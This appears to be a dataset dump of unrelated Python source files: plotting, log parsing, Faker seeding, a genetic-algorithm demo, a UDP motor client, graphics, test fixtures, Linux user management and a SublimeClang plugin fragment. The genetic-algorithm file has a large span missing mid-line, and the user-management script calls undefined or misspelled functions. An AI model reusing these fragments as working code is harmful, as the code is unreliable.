elemento\")\n","sub_path":"ejercicios-clase/unidad7/excepciones.py","file_name":"excepciones.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"388050149","text":"\nimport sys\nimport os\n# from _pickle import dump\nsys.path.insert(0, os.path.abspath('..'))\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport math\n\nclass MapData(object):\n def __init__(self):\n return\n def get_df(self):\n filepath = '../data/map_data.txt'\n names = ['x','y','landmark_id']\n df = pd.read_csv(filepath, sep=None, header=None, names=names,engine='python')\n print(df.describe())\n return df\n def disp_landmarks(self,df):\n fig, ax = plt.subplots()\n ax.scatter(df['x'], df['y'], color='green')\n \n for i, txt in enumerate(df['landmark_id']):\n ax.annotate(str(txt), (df['x'][i],df['y'][i]))\n \n gt_df = self.get_gtdf()\n ax.scatter(gt_df['x'], gt_df['y'])\n ax.set_title('ground truth and landmarks')\n return\n def get_gtdf(self):\n filepath = '../data/gt_data.txt'\n names = ['x','y','yaw']\n df = pd.read_csv(filepath, sep=None, header=None, names=names,engine='python')\n print(df.describe())\n return df\n def run(self):\n df = self.get_df()\n self.disp_landmarks(df)\n plt.show()\n return\n\n\n\n\nif __name__ == \"__main__\": \n obj= MapData()\n obj.run()\n ","sub_path":"visualization/map_data.py","file_name":"map_data.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"217578640","text":"# coding =utf-8\nimport gzip\nimport re\nfrom os import listdir, mkdir, sep\nfrom datetime import datetime\nfrom multiprocessing import Pool\n\nfrom_folder = \"20140717\"\nto_folder = from_folder + \"_url\"\ntry:\n mkdir(to_folder)\nexcept:\n pass\n\n\nurl_pattern = re.compile(r'http\\:\\/\\/([^\\:]*?)\\/')\n\n\ndef soft_excute(fn):\n def call_func(*args, **kwargs):\n try:\n fn(*args, **kwargs)\n print(\"[OK] \", datetime.now().__str__(), \" @\", fn.__str__(), \" args:\", args[:5])\n except:\n print(\"[Ignore] \", datetime.now().__str__(), \" @\", fn.__str__(), \" args:\", args[:5])\n\n return call_func\n\n\n# @soft_excute\ndef parse_data(filename):\n try:\n f = gzip.open(from_folder + sep + filename, \"rt\", encoding=\"utf-8\")\n parsed_data = []\n for line in f:\n url = re.findall(url_pattern, line)\n if url:\n # print(url)\n line_tuple = line.split(\"|\")\n if len(line_tuple) != 26:\n 
continue\n # print(line)\n # imei , url, lac, ci, traffic_type, start_time, datatype, up_traffic, down_traffic,\n data_i = (line_tuple[3], url[0], line_tuple[1], line_tuple[2],\n line_tuple[4], line_tuple[5].split(\".\")[0],\n line_tuple[20].split(\";\")[0],line_tuple[8], line_tuple[9], )\n # print(new_tuple)\n parsed_data.append(\",\".join(data_i) + \"\\n\")\n f.close()\n to_write = \"\".join(parsed_data)\n to_filename = filename.split(\".\")[0] + \".csv\"\n with open(to_folder + sep + to_filename, \"wt\") as f:\n f.write(to_write)\n print(\"[OK] \", datetime.now().__str__(), \" @\", filename)\n except:\n print(\"[Ignore] \", datetime.now().__str__(), \" @\", filename)\n\n\ndef parse_all():\n item_files = listdir(from_folder)\n for item_file in item_files:\n parse_data(item_file)\n\n\ndef pare_all_parrerall(cores=12):\n pool = Pool(cores)\n item_files = listdir(from_folder)\n print(\"n_job: \", len(item_files), \" :\", item_files[:4])\n for item_file in item_files:\n pool.apply_async(parse_data, args=(item_file,))\n t0 = datetime.now()\n print(\"start...@\", t0)\n pool.close()\n pool.join()\n t1 = datetime.now()\n print(\"finish...@\", t1)\n print(\"time used:\", t1 - t0)\n\n\nif __name__ == '__main__':\n pare_all_parrerall()\n","sub_path":"0parseurl.py","file_name":"0parseurl.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"339681419","text":"from random import randint\nfrom faker import Faker\nfrom faker.providers import internet\nfrom . import db\nfrom .models import Post, Customer, Order, TicketsTiers, CusaEvents, User, Blog\nfrom sqlalchemy.exc import IntegrityError\n\n\ndef posts(count=5):\n fake = Faker()\n user_count = User.query.count()\n for i in range(count):\n u = User.query.offset(randint(0, user_count - 1)).first()\n p = Post(body=fake.text(),\n timestamp=fake.past_date(),\n author=u,\n title=fake.word(),\n intro=fake.sentence()\n )\n db.session.add(p)\n try:\n db.session.commit()\n except IntegrityError:\n db.session.rollback()\n\n\ndef users(count=5):\n fake = Faker()\n i = 0\n while i < count:\n u = User(email=fake.email(),\n username=fake.user_name(),\n password='password',\n confirmed=True,\n name=fake.name(),\n location=fake.city(),\n about_me=fake.text(),\n )\n db.session.add(u)\n try:\n db.session.commit()\n i += 1\n except IntegrityError:\n db.session.rollback()\n\n\ndef customers(count=5):\n fake = Faker()\n for i in range(count):\n c = Customer(phone=fake.phone_number())\n db.session.add(c)\n try:\n db.session.commit()\n except IntegrityError:\n db.session.rollback()\n\n\ndef orders(count=5):\n # fake = Faker()\n customer_count = Customer.query.count()\n for i in range(count):\n c = Customer.query.offset(randint(0, customer_count - 1)).first()\n o = Order(ticket=TicketsTiers.REG, customer=c, event=CusaEvents.SINGER)\n o.token = o.generate_token()\n db.session.add(o)\n try:\n db.session.commit()\n except IntegrityError:\n db.session.rollback()\n\n\ndef blog(count=5):\n fake = Faker()\n user_count = User.query.count()\n for i in range(count):\n u = User.query.offset(randint(0, user_count - 1)).first()\n p = Blog(created_at=fake.past_datetime(start_date=\"-30d\", tzinfo=None),\n title=' '.join(fake.words(nb=2, ext_word_list=None)),\n intro=' '.join(fake.words(nb=3, ext_word_list=None)),\n 
avatar_url='https://yiban.io/blog/wp-content/uploads/2019/06/%E9%BB%98%E8%AE%A4%E6%A0%87%E9%A2%98_%E5%85%AC%E4%BC%97%E5%8F%B7%E5%B0%81%E9%9D%A2%E9%A6%96%E5%9B%BE_2019.06.19-2-wps%E5%9B%BE%E7%89%87.png',\n blog_url='https://raw.githubusercontent.com/v1siuol/leetCode/master/README.md',\n background_color=fake.hex_color(),\n font_color=fake.hex_color(),\n author=u\n )\n db.session.add(p)\n try:\n db.session.commit()\n db.session.refresh(p)\n p.order_idx = p.id\n db.session.commit()\n\n except IntegrityError:\n db.session.rollback()\n","sub_path":"app/fake.py","file_name":"fake.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"432091424","text":"###############################################################################\n# EvoMan FrameWork - V1.0 2016 \t\t\t #\n# DEMO : Neuroevolution - Genetic Algorithm with neural network. #\n# Author: Karine Miras \t\t\t #\n# karine.smiras@gmail.com \t\t\t\t #\n###############################################################################\n\n# imports framework\nimport sys\nsys.path.insert(0, 'evoman')\nfrom environment import Environment\nfrom demo_controller import player_controller\n\n# imports other libs\nimport time\nimport numpy as np\nfrom math import fabs,sqrt\nimport glob, os\n\n# choose this for not using visuals and thus making experiments faster\nheadless = True\nif headless:\n os.environ[\"SDL_VIDEODRIVER\"] = \"dummy\"\n\nn_hidden_neurons = 10\n\nexperiment_name = 'multi_demo'\nif not os.path.exists(experiment_name):\n os.makedirs(experiment_name)\n\n# initializes simulation in multi evolution mode, for multiple static enemies.\nenv = Environment(experiment_name=experiment_name,\n enemies=[7,8],\n multiplemode=\"yes\",\n playermode=\"ai\",\n player_controller=player_controller(n_hidden_neurons),\n enemymode=\"static\",\n level=2,\n speed=\"fastest\")\n\n# default environment fitness is assumed for experiment\n\nenv.state_to_log() # checks environment state\n\n\n#### Optimization for controller solution (best genotype-weights for phenotype-network): Ganetic Algorihm ###\n\nini = time.time() # sets time marker\n\n\n# genetic algorithm params\n\nrun_mode = 'train' # train or test\n\n# number of weights for multilayer with 10 hidden neurons.\nn_vars = (env.get_num_sensors()+1)*n_hidden_neurons + (n_hidden_neurons+1)*5\n\ndom_u = 1\ndom_l = -1\nnpop = 100\ngens = 30\nmutation = 0.2\nlast_best = 0\n\nnp.random.seed(420)\n\n\n\n# runs simulation\ndef simulation(env,x):\n f,p,e,t = env.play(pcont=x)\n return f\n\n# normalizes\ndef norm(x,pfit_pop):\n\n if ( max(pfit_pop) - min(pfit_pop) ) > 0:\n x_norm = ( x - min(pfit_pop) )/( max(pfit_pop) - min(pfit_pop) )\n else:\n x_norm = 0\n\n if x_norm <= 0:\n x_norm = 0.0000000001\n return x_norm\n\n\n# evaluation\ndef evaluate(x):\n return np.array(list(map(lambda y: simulation(env,y), x)))\n\n\n# tournament\ndef tournament(pop):\n c1 = np.random.randint(0,pop.shape[0], 1)\n c2 = np.random.randint(0,pop.shape[0], 1)\n\n if fit_pop[c1] > fit_pop[c2]:\n return pop[c1][0]\n else:\n return pop[c2][0]\n\n\n# limits\ndef limits(x):\n\n if x>dom_u:\n return dom_u\n elif x= 15:\n\n file_aux = open(experiment_name+'/results.txt','a')\n file_aux.write('\\ndoomsday')\n file_aux.close()\n\n pop, fit_pop = doomsday(pop,fit_pop)\n notimproved = 0\n\n best = np.argmax(fit_pop)\n std = np.std(fit_pop)\n mean = np.mean(fit_pop)\n\n\n # saves results\n file_aux = open(experiment_name+'/results.txt','a')\n print( '\\n 
GENERATION '+str(i)+' '+str(round(fit_pop[best],6))+' '+str(round(mean,6))+' '+str(round(std,6)))\n file_aux.write('\\n'+str(i)+' '+str(round(fit_pop[best],6))+' '+str(round(mean,6))+' '+str(round(std,6)) )\n file_aux.close()\n\n # saves generation number\n file_aux = open(experiment_name+'/gen.txt','w')\n file_aux.write(str(i))\n file_aux.close()\n\n # saves file with the best solution\n np.savetxt(experiment_name+'/best.txt',pop[best])\n\n # saves simulation state\n solutions = [pop, fit_pop]\n env.update_solutions(solutions)\n env.save_state()\n\n\n\n\nfim = time.time() # prints total execution time for experiment\nprint( '\\nExecution time: '+str(round((fim-ini)/60))+' minutes \\n')\n\n\nfile = open(experiment_name+'/neuroended', 'w') # saves control (simulation has ended) file for bash loop file\nfile.close()\n\n\nenv.state_to_log() # checks environment state\n","sub_path":"optimization_generalist_demo.py","file_name":"optimization_generalist_demo.py","file_ext":"py","file_size_in_byte":7886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"77255043","text":"import time\nfrom socket import *\nimport time\nfrom threading import Thread\nimport sys\nimport threading\ndef threaded(func):\n def wrapper(*_args, **kwargs):\n t = threading.Thread(target=func, args=_args)\n t.start()\n return\n return wrapper\n\n\nclass thread_motor(Thread):\n\n def run(self):\n\n inicio = time.time()\n fim = 0\n while True:\n \n if fim - inicio > 3:\n #print(fim - inicio)\n \n inicio = time.time()\n pong()\n \n fim = time.time()\n\n\n \nlog_file=open('MET_Logs.log', 'w')\ntry:\n arquivo = open(\"IP-Raspberry.txt\",\"r\")\n IP = arquivo.readline()\nexcept:\n print(\"The file IP-Raspberry.txt is corrupted or was deleted; create the file and put the Raspberry Pi IP in it\",file=log_file)\n sys.exit()\n\n\n \nIP = str(IP)\n\nPORT = 12001\naddr = (IP, PORT)\nclientSocket = socket(AF_INET, SOCK_DGRAM)\nclientSocket.settimeout(1)\n\n@threaded\ndef Subir_descer(vel,controle,deslocamento):\n print(\"computing S_D\")\t\n freq = vcalcular(vel)\n MSG = \"SeD:\"+str(vel)+':'+str(freq)+':'+str(controle)+':'+str(deslocamento)\n MSG =MSG.encode()\n\n ##print(MSG)\n clientSocket.sendto(MSG, addr)\n print(\"S_D message sent\")\n try:\n data, server = clientSocket.recvfrom(4)\n #print ('%s' % (data)) \n except:\n Subir_descer(vel,controle,deslocamento)\n print(\"SEND FAILED, RESENDING S_D\")\n@threaded \ndef Parar():\n \n MSG = b\"STOP\" \n clientSocket.sendto(MSG, addr)\n print(\" SENDING STOP\")\n try:\n data, server = clientSocket.recvfrom(4)\n #print ('%s' % (data)) \n except:\n Parar()\n print(\"SEND FAILED, RESENDING STOP\")\n@threaded \ndef subir():\n \n MSG = b\"SUBIR\" \n clientSocket.sendto(MSG, addr)\n try:\n data, server = clientSocket.recvfrom(4)\n #print ('%s' % (data)) \n except:\n subir() \n@threaded\ndef baixar():\n \n MSG = b\"BAIXAR\" \n clientSocket.sendto(MSG, addr)\n try:\n data, server = clientSocket.recvfrom(4)\n \n #print ('%s' % (data)) \n except:\n baixar()\n\n\n\ndef vcalcular(valor) :\n \"\"\"\n The vcalcular function computes the frequency needed for a displacement in mm/min (the function's parameter).\n Since no clear trend was found in the frequency curve of the motor controller,\n several small line segments were fitted instead. How do you build these segments for your own stepper motor?\n For our test machine we use speeds from 8 mm/min up to 175 mm/min,\n as can be seen in the conditional statements (if) used below:\n we draw small line segments between pairs of points. In the first condition the displacement range is\n 8 mm/min to 14 mm/min, and frequencia is the variable used to store the equation of the line that\n receives the mm/min value the machine must travel at and computes the frequency needed for it.\n Afterwards the thread responsible for moving the motor is started and the motor begins moving at the desired speed.\n To obtain the equation of a line you should guess a frequency; you can do that with the function get_pontos(frequencia_chutada).\n That function keeps the machine running for 1 min; once the machine stops, measure the distance it traveled with a caliper\n or other equipment with good precision, then record the guessed value and the measured result in a table; once\n you have two points you can compute your first line segment.\n 
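For example (added, illustrative): a speed of 10 mm/min falls in the first branch,\n so the frequency is (4.166666666666667*10 + 16.666666666666664)*0.96 = 56.0.\n 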
\"\"\"\n global frequencia\n valor = float(valor)\n velocidadei = valor;\n \n if (valor >= 8 and valor <= 14) :\n \n return (4.166666666666667*valor + 16.666666666666664)*0.96;\n \n \n \n if (valor > 14 and valor <= 16) :\n \n return (12.5*valor - 100)*0.96;\n \n \n if (valor > 16 and valor <= 21) :\n \n return (5*valor + 20)*0.96;\n \n \n if (valor > 21 and valor <= 26) :\n \n return (5*valor + 20)*0.96;\n \n \n if (valor > 26 and valor <= 33) :\n \n return (7.142857142857143*valor - 35.71428571428572)*0.96;\n \n \n \n if (valor > 33 and valor <= 45) :\n\n return (4.166666666666667*valor + 62.5)*0.96;\n \n\n\n\n \n elif(valor > 45 and valor <= 49 ) :\n return (12.5*valor -312.5)*0.96;\n \n \n\n \n \n elif(valor > 49 and valor <= 58) :\n \n return (5.555555555555555*valor + 27.77777777777777)*0.96\n #print(frequencia)\n \n \n elif(valor > 58 and valor <= 67) :\n\n \n return (5.555555555555555*valor + 27.77777777777777)*0.96;\n \n \n \n elif(valor > 67 and valor <= 73) :\n \n return (8.333333333333334 *valor -158.33333333333337)*0.96;\n \n \n \n elif(valor > 73 and valor <= 83) :\n \n return (5 *valor + 85)*0.96\n \n \n elif(valor > 83 and valor <= 87) :\n return (10*valor -330)*0.96;\n\n \n \n \n elif(valor > 87 and valor <= 97) :\n \n return (6*valor+18)*0.96;\n\n \n \n elif(valor > 97 and valor <= 106) : \n \n return (5.555555555555555*valor +61.111111111111086)*0.96\n\n \n \n \n elif(valor > 106 and valor <= 113):\n return (7.142857142857143 *valor -107.14285714285722)*0.96\n \n \n elif(valor > 113 and valor <= 119):\n return (8.333333333333334*valor -241.66666666666674)*0.96\n\n \n \n elif(valor > 119 and valor <= 126):\n return (7.142857142857143*valor- 100)*0.96;\n\n \n \n elif(valor > 126 and valor <= 133):\n return (7.142857142857143*valor - 100)*0.96\n \n \n elif(valor > 133 and valor <= 141) :\n\n return (4.545454545454546*valor + 245.45454545454538)*0.96\n\n \n elif(valor > 141 and valor <= 175) :\n return (6.323529411764706* valor +8.382352941176464)*0.96\n\n@threaded\ndef calcular(valor):\n\n freq = vcalcular(valor)\n \n MSG = \"Cal:\"+str(valor)+':'+str(freq)\n MSG 
=MSG.encode()\n clientSocket.sendto(MSG, addr)\n try:\n data, server = clientSocket.recvfrom(1024)\n print(\" ping recebido\")\n return [1,IP,PORT] \n except:\n return [0,IP,PORT]\n\ndef start_thread(): \n \n thrMotor = thread_motor()\n thrMotor.start()\n@threaded\ndef freqparabotao():\n freqbt = vcalcular(70)\n\n MSG = \"fb:\"+str(freqbt)\n MSG =MSG.encode()\n ##print(MSG)\n clientSocket.sendto(MSG, addr)\n\n\n'''subir()\nbaixar()\nParar()\nSubir_descer(100.1,1,120)\ncalcular(150)'''\n\n","sub_path":"Cliente/Modulos/clientMotor-udp.py","file_name":"clientMotor-udp.py","file_ext":"py","file_size_in_byte":6988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"153895859","text":"import random\r\nfrom graphics import *\r\nimport math as mt\r\nimport time\r\nimport numpy as np\r\n\r\n# coordinates of parallelepiped\r\nxw = 600\r\nyw = 600\r\nst = 300\r\n\r\n# matrix of coordinates\r\nParallelepiped = np.array([[0, 0, 0, 1],\r\n [st, 0, 0, 1],\r\n [st, st, 0, 1],\r\n [0, st, 0, 1],\r\n [0, 0, st, 1],\r\n [st, 0, st, 1],\r\n [st, st, st, 1],\r\n [0, st, st, 1]])\r\nprint(\"Координати паралелепіпеда у вигляді матриці\")\r\nprint(Parallelepiped)\r\n\r\n# функція проекції на ХОУ\r\ndef ProjectXY(Figure):\r\n f = np.array([[1, 0, 0, 0],\r\n [0, 1, 0, 0],\r\n [0, 0, 0, 0],\r\n [0, 0, 0, 1]]) # по строках\r\n ft=f.T\r\n Prxy = Figure.dot(ft)\r\n print('Проекція на ХОУ')\r\n print(Prxy)\r\n return Prxy\r\n\r\n# зміщення\r\ndef ShiftXYZ(Figure, l, m, n):\r\n f = np.array([[1, 0, 0, l],\r\n [0, 1, 0, m],\r\n [0, 0, 1, n],\r\n [1, 0, 0, 1]]) # по строках\r\n ft=f.T\r\n Prxy = Figure.dot(ft)\r\n print('зміщення')\r\n print(Prxy)\r\n return Prxy\r\n# обертання коло oх\r\ndef insertX(Figure, TetaG):\r\n TetaR=(3/14*TetaG)/180\r\n f = np.array([[1, 0, 0, 0],\r\n [0, mt.cos(TetaR), mt.sin(TetaR), 0],\r\n [0, -mt.sin(TetaR), mt.cos(TetaR), 0],\r\n [0, 0, 0, 1]])\r\n ft=f.T\r\n Prxy = Figure.dot(ft)\r\n print('обертання коло х')\r\n print(Prxy)\r\n return Prxy\r\n# аксонометрія\r\ndef dimetri(Figure, TetaG1, TetaG2):\r\n\r\n TetaR1=(3/14*TetaG1)/180\r\n TetaR2=(3/14*TetaG2)/180\r\n\r\n f1 = np.array([[mt.cos(TetaR1), 0, -mt.sin(TetaR1), 0],\r\n [0, 1, 0, 0],\r\n [mt.sin(TetaR1), 0, mt.cos(TetaR1), 1],\r\n [0, 0, 0, 0]])\r\n ft1 = f1.T\r\n Prxy1 = Figure.dot(ft1)\r\n f2 = np.array([[1, 0, 0, 0],\r\n [0, mt.cos(TetaR2), mt.sin(TetaR2), 0],\r\n [0, -mt.sin(TetaR2), mt.cos(TetaR2), 0],\r\n [0, 0, 0, 1] ])\r\n ft2=f2.T\r\n Prxy2 = Prxy1.dot(ft2)\r\n print('Аксонометрія')\r\n print(Prxy2)\r\n return Prxy2\r\n# функція побудови паралелепіпеда\r\ndef PrlpdWiz(Prxy):\r\n Ax = Prxy[0, 0]\r\n Ay = Prxy[0, 1]\r\n\r\n Bx = Prxy[1, 0]\r\n By = Prxy[1, 1]\r\n\r\n Ix = Prxy[2, 0]\r\n Iy = Prxy[2, 1]\r\n\r\n Mx = Prxy[3, 0]\r\n My = Prxy[3, 1]\r\n\r\n Dx = Prxy[4, 0]\r\n Dy = Prxy[4, 1]\r\n\r\n Cx = Prxy[5, 0]\r\n Cy = Prxy[5, 1]\r\n\r\n Fx = Prxy[6, 0]\r\n Fy = Prxy[6, 1]\r\n\r\n Ex = Prxy[7, 0]\r\n Ey = Prxy[7, 1]\r\n\r\n # print(Ax, Ay); print(Bx, By); print(Ix, Iy); print(Mx, My);\r\n # print(Dx, Dy); print(Cx, Cy); print(Fx, Fy); print(Ex, Ey);\r\n colors = [\"red\", \"orange\", \"magenta\", \"pink\", \"lime\", \"green\", \"black\"]\r\n colors_2 = [\"skyblue\", \"cyan\", \"blue\"]\r\n a = colors[random.randint(0, len(colors) - 1)]\r\n b = colors[random.randint(0, len(colors) - 1)]\r\n c = colors[random.randint(0, len(colors) - 1)]\r\n d = colors[random.randint(0, len(colors) - 1)]\r\n e = colors_2[random.randint(0, len(colors_2) - 1)]\r\n z = colors_2[random.randint(0, 
len(colors_2) - 1)]\r\n t = colors_2[random.randint(0, len(colors_2) - 1)]\r\n r = colors_2[random.randint(0, len(colors_2) - 1)]\r\n\r\n\r\n\r\n obj1 = Polygon(Point(Ax, Ay), Point(Bx, By), Point(Ix, Iy), Point(Mx, My))\r\n obj1.setFill(e)\r\n obj1.setOutline(a)\r\n obj1.draw(win)\r\n\r\n obj2 = Polygon(Point(Dx, Dy), Point(Cx, Cy), Point(Fx, Fy), Point(Ex, Ey))\r\n obj2.setFill(z)\r\n obj2.setOutline(b)\r\n obj2.draw(win)\r\n\r\n obj3 = Polygon(Point(Ax, Ay), Point(Bx, By), Point(Cx, Cy), Point(Dx, Dy))\r\n obj3.setFill(t)\r\n obj3.setOutline(c)\r\n obj3.draw(win)\r\n\r\n obj4 = Polygon(Point(Mx, My), Point(Ix, Iy), Point(Fx, Fy), Point(Ex, Ey))\r\n obj4.setFill(r)\r\n obj4.setOutline(d)\r\n obj4.draw(win)\r\n return PrlpdWiz\r\n#-------------------------------------------- побудова паралелепіпеда -----------------------------\r\nwin = GraphWin(\"3-D модель паралелепіпеда, аксонометрічна проекція на ХУ\", xw, yw)\r\nwin.setBackground('white')\r\nxw=600\r\nyw=600\r\nst=50\r\nTetaG1=0\r\nTetaG2=-90\r\nl=(xw/3)-st\r\nm=(yw/3)-st\r\nn=m\r\n\r\n#Prlpd1=ShiftXYZ (Prlpd, l, m, n)\r\n#Prlpd2=dimetri (Prlpd1, TetaG1, TetaG2)\r\n#Prlpd2=insertX (Prlpd1, TetaG1)\r\n#Prxy3=ProjectXY (Prlpd2)\r\n\r\nPrxy3 = Parallelepiped\r\nPrlpdWiz(Prxy3)\r\nwin.getMouse()\r\nwin.close()\r\n\r\nwin = GraphWin(\"3-D модель паралелепіпеда, аксонометрічна проекція на ХУ\", xw, yw)\r\nwin.setBackground('white')\r\nxw=600\r\nyw=600\r\nst=50\r\nTetaG1=0\r\nTetaG2=-90\r\n\r\n# l=(xw/3)-st\r\nm=(yw/3)-st\r\n# n=m\r\n\r\nPrlpd1=ShiftXYZ (Parallelepiped, l, m, n)\r\n#Prlpd2=dimetri (Prlpd1, TetaG1, TetaG2)\r\nPrlpd2=insertX(Prlpd1, TetaG1)\r\nPrxy3=ProjectXY(Prlpd2)\r\nPrlpdWiz(Prxy3)\r\nwin.getMouse()\r\nwin.close()\r\n\r\nwin = GraphWin(\"3-D модель паралелепіпеда оберт коло Х аксонометрічна проекція на ХУ\", xw, yw)\r\nwin.setBackground('white')\r\nxw=600\r\nyw=600\r\nst=50\r\nTetaG1=180\r\nTetaG2=-90\r\nl=(xw/3)-st\r\nm=(yw/3)-st\r\nn=m\r\nPrlpd1=ShiftXYZ (Parallelepiped, l, m, n)\r\n#Prlpd2=dimetri (Prlpd1, TetaG1, TetaG2)\r\nPrlpd2=insertX(Prlpd1, TetaG1)\r\nPrxy3=ProjectXY(Prlpd2)\r\nPrlpdWiz(Prxy3)\r\nwin.getMouse()\r\nwin.close()\r\n\r\nwin = GraphWin(\"3-D паралелепіпеда діметричний оберт навколо Х та У аксонометрічна проекція на ХУ\", xw, yw)\r\nwin.setBackground('white')\r\nxw=600\r\nyw=600\r\nst=50\r\nTetaG1=180\r\nTetaG2=-90\r\nl=(xw/2)-st\r\nm=(yw/2)-st\r\nn = m\r\nPrlpd1=ShiftXYZ(Parallelepiped, l, m, n)\r\nPrlpd2=dimetri(Prlpd1, TetaG1, TetaG2)\r\n#Prlpd2=insertX (Prlpd1, TetaG1)\r\nPrxy3=ProjectXY(Prlpd2)\r\nPrlpdWiz(Prxy3)\r\nwin.getMouse()\r\nwin.close()\r\n\r\n","sub_path":"Lab3.py","file_name":"Lab3.py","file_ext":"py","file_size_in_byte":6021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"310302227","text":"\"\"\" Utility functions for tests. 
\"\"\"\nimport numpy as np\nimport pytest\nfrom affine import Affine\nimport rasterio as rio\n\n\n@pytest.fixture\ndef basic_image():\n \"\"\"\n A 10x10 array with a square (3x3) feature\n Equivalent to results of rasterizing basic_geometry with all_touched=True.\n Borrowed from rasterio/tests/conftest.py\n\n Returns\n -------\n numpy ndarray\n \"\"\"\n image = np.zeros((10, 10), dtype=np.uint8)\n image[2:5, 2:5] = 1\n return image\n\n\n@pytest.fixture\ndef basic_image_tif(tmpdir, basic_image):\n \"\"\"\n A GeoTIFF representation of the basic_image array.\n Borrowed from rasterio/tests/conftest.py\n\n Returns\n -------\n string path to raster file\n \"\"\"\n outfilename = str(tmpdir.join(\"basic_image.tif\"))\n kwargs = {\n \"crs\": rio.crs.CRS({\"init\": \"epsg:4326\"}),\n \"transform\": Affine.identity(),\n \"count\": 1,\n \"dtype\": rio.uint8,\n \"driver\": \"GTiff\",\n \"width\": basic_image.shape[1],\n \"height\": basic_image.shape[0],\n \"nodata\": None,\n }\n with rio.open(outfilename, \"w\", **kwargs) as out:\n out.write(basic_image, indexes=1)\n return outfilename\n\n\n@pytest.fixture\ndef image_array_2bands():\n return np.random.randint(10, size=(2, 4, 5))\n","sub_path":"earthpy/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"591481592","text":"#!/usr/bin/env python3.6\n\nimport sys\nimport subprocess\nimport pwd\n\n\ndef add(user_info):\n print(f\"Adding a new user '{user_info['name']}'\")\n try:\n subprocess.call(['useradd',\n '-p',\n user_info['password'],\n '-G',\n _groups_str(user_info),\n user_info['name'],\n ])\n except:\n print(f\"Failed to add user '{user_info['name']}'\")\n sys.exit(1)\n\ndef remove_user(user_info):\n print(f\"Removing user '{user_info['name']}'\")\n\n try:\n subprocess.call(['userdel',\n '-r',\n user_info['name']\n ])\n except:\n print(f\"Failed to remove the user '{user_info['name']}'\")\n sys.exit(1)\n\ndef update_user(user_info):\n print(f\"Updating user '{user_info['name']}'\")\n try:\n subprocess.call(['usermod',\n '-p',\n user_info['password'],\n '-G',\n _groups_str(user_info),\n user_info['name'],\n ])\n except:\n print(f\"Failed to update the user '{user_info['name']}'\")\n sys.exit(1)\n\ndef sync(users, existing_user_names=None):\n existing_user_names = (existing_user_names or _user_names())\n user_names = [user['name'] for user in users]\n for user in users:\n if user['name'] not in existing_user_names:\n add(user)\n elif user['name'] in existing_user_names:\n update_user(user)\n for user_name in existing_user_names:\n if not user_name in user_names:\n remove({'name': user_name})\n\ndef _groups_str(user_info):\n return '.'.join(user_info['groups'] or [])\n\ndef _user_names():\n return [user.pw_name for user in pwd.getwall()\n if user.pw_uid >= 1000 and 'home' in user.pw_dir]\n","sub_path":"src/hr/hr_user_manag.py","file_name":"hr_user_manag.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"577377906","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nCopyright (c) 2011-2012 Fredrik Ehnbom\n\nThis software is provided 'as-is', without any express or implied\nwarranty. 
In no event will the authors be held liable for any damages\narising from the use of this software.\n\nPermission is granted to anyone to use this software for any purpose,\nincluding commercial applications, and to alter it and redistribute it\nfreely, subject to the following restrictions:\n\n 1. The origin of this software must not be misrepresented; you must not\n claim that you wrote the original software. If you use this software\n in a product, an acknowledgment in the product documentation would be\n appreciated but is not required.\n\n 2. Altered source versions must be plainly marked as such, and must not be\n misrepresented as being the original software.\n\n 3. This notice may not be removed or altered from any source\n distribution.\n\"\"\"\n\n\"\"\"\nCopyright (c) 2016 Sami Väisänen, Ensisoft\nhttp://www.ensisoft.com\n\"\"\"\n\nimport sublime\ntry:\n import ctypes\nexcept:\n sublime.error_message(\\\n\"\"\"Unfortunately ctypes can't be imported, so SublimeClang will not work.\n\nThere is a work around for this to get it to work, \\\nplease see http://www.github.com/ensisoft/SublimeClang for more details. \"\"\")\n\nfrom internals.clang import cindex\nfrom internals import common\nfrom internals import translationunit as tulib\nfrom internals import translationunitcache as cache\nfrom internals.translationunitcache import Language as Language\nfrom internals.translationunitcache import CompileOptions as CompileOptions\nfrom internals.translationunitcache import TranslationUnitCache as TUCache\nfrom sublime import Region\nimport sublime\nimport sublime_plugin\nimport errormarkers\nimport threading\nimport os\nimport re\nimport sys\nimport Queue as Queue\n\n# todo: what's with the sencode??\ndef get_filename(view):\n return common.sencode(view.file_name())\n\n\n# identify the language inside the file the view displays\ndef get_language(view):\n language_regex = re.compile(\"(?<=source\\.)[\\w+#]+\")\n\n caret = view.sel()[0].a\n language = language_regex.search(view.scope_name(caret))\n if language == None:\n return Language(Language.Other)\n lang = language.group(0).lower()\n #print(\"LANG IS : \" + lang)\n if lang in \"c\":\n return Language(Language.C)\n elif lang in \"c++\":\n return Language(Language.CPP)\n elif lang in \"objc\":\n return Language(Language.ObjC)\n elif lang in \"objc++\":\n return Language(Language.ObjCPP)\n\n return Language(Language.Other)\n\n\nSystemIncludes = None\n\n\n# collect all compilation options based on the view and the file\n# the user is currently working on.\n# creates a CompileOptions object.\ndef collect_all_options(view, filename, language):\n assert view is not None\n assert filename is not None\n assert language is not None\n assert language.is_supported()\n assert cindex.conf is not None\n\n global SystemIncludes\n\n # use clang to figure out the magical -isystem paths\n # todo: ObjC and ObjCPP ??\n if SystemIncludes == None:\n packages = sublime.packages_path()\n package = os.path.join(packages, \"SublimeClang\")\n source = \"\"\n compiler = \"\"\n cindex.conf.arch = sublime.arch()\n if language.kind == Language.C:\n source = 